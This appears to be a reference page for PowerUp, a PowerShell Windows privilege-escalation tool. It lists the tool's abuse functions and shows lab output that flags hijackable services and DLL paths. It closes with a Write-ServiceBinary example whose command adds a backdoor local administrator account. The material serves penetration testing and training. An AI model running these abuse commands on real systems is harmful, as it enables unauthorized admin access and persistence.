PowerUp – Security Slice

Description

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Platform	Windows
Author	Matthew Graeber
License	BSD 3-Clause
URL	PowerUp.ps1

Usage

Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

Token/Privilege Enumeration/Abuse:

Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not
Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID
Enable-Privilege                    -   enables a specific privilege for the current process

Service Enumeration/Abuse:

Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name
Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config
Get-ModifiableService               -   returns services the current user can modify
Get-ServiceDetail                   -   returns detailed information about a specified service
Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value
Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command
Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command
Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command
Restore-ServiceBinary               -   restores a replaced service binary with the original executable

DLL Hijacking:

Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes
Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities
Write-HijackDll                     -   writes out a hijackable DLL

Registry Checks:

Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set
Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry
Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Miscellaneous Checks:

Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files
Get-UnattendedInstallFile           -   finds remaining unattended installation files
Get-Webconfig                       -   checks for any encrypted web.config strings
Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords
Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfee's SiteList.xml files
Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files

Other Helpers/Meta-Functions:

Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify
Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added
Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)

Examples

getting started

This is how you invoke PowerUp in PowerShell for the first time.

PS C:\tools> import-module .\PowerUp.ps1
 
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\tools\PowerUp.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R

Invoke-AllChecks

This will run all the checks available in PowerUp.

PS C:\tools> Invoke-AllChecks
 
[*] Running Invoke-AllChecks
 
 
[*] Checking if user is in a local group with administrative privileges...
 
 
[*] Checking for unquoted service paths...
 
 
ServiceName    : Video Stream
Path           : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'Video Stream' -Path <HijackPath>
CanRestart     : False
 
ServiceName    : Video Stream
Path           : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'Video Stream' -Path <HijackPath>
CanRestart     : False
 
 
 
 
 
[*] Checking service executable and argument permissions...
 
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
 
ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False
 
ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False
 
ServiceName                     : gupdatem
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdatem'
CanRestart                      : False
 
ServiceName                     : gupdatem
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdatem'
CanRestart                      : False
 
ServiceName                     : neo4j
Path                            : C:\Tools\neo4j\bin\tools\prunsrv-amd64.exe //RS//neo4j
ModifiableFile                  : C:\Tools\neo4j\bin\tools\prunsrv-amd64.exe
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'neo4j'
CanRestart                      : False
 
ServiceName                     : Video Stream
Path                            : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiableFile                  : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'Video Stream'
CanRestart                      : False
 
 
 
 
 
[*] Checking service permissions...
 
 
[*] Checking %PATH% for potentially hijackable DLL locations...
 
 
ModifiablePath    : C:\Python27\
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27\
AbuseFunction     : Write-HijackDll -DllPath 'C:\Python27\\wlbsctrl.dll'
 
ModifiablePath    : C:\Python27\Scripts
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27\Scripts
AbuseFunction     : Write-HijackDll -DllPath 'C:\Python27\Scripts\wlbsctrl.dll'
 
ModifiablePath    : C:\Tools
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Tools\SysinternalsSuite
AbuseFunction     : Write-HijackDll -DllPath 'C:\Tools\wlbsctrl.dll'
 
ModifiablePath    : C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps
IdentityReference : SEC560STUDENT\notadmin
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
 
 
 
 
[*] Checking for AlwaysInstallElevated registry key...
 
 
[*] Checking for Autologon credentials in registry...
 
 
[*] Checking for modifidable registry autoruns and configs...
 
 
[*] Checking for modifiable schtask files/configs...
 
 
[*] Checking for unattended install files...
 
 
[*] Checking for encrypted web.config strings...
 
 
[*] Checking for encrypted application pool and virtual directory passwords...
 
 
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
 
 
 
 
[*] Checking for cached Group Policy Preferences .xml files....

Write-ServiceBinary -ServiceName ‘<service name>’ -Path ‘<vulnerable path>’

This command will write the vulnerable path identified in the previous command to the registry entry of the vulnerable service.

PS C:\tools> Write-ServiceBinary -ServiceName 'Video Stream' -Path 'C:\Program Files\VideoStream\1337.exe'
 
ServiceName  Path                                  Command
-----------  ----                                  -------
Video Stream C:\Program Files\VideoStream\1337.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add

Blog Posts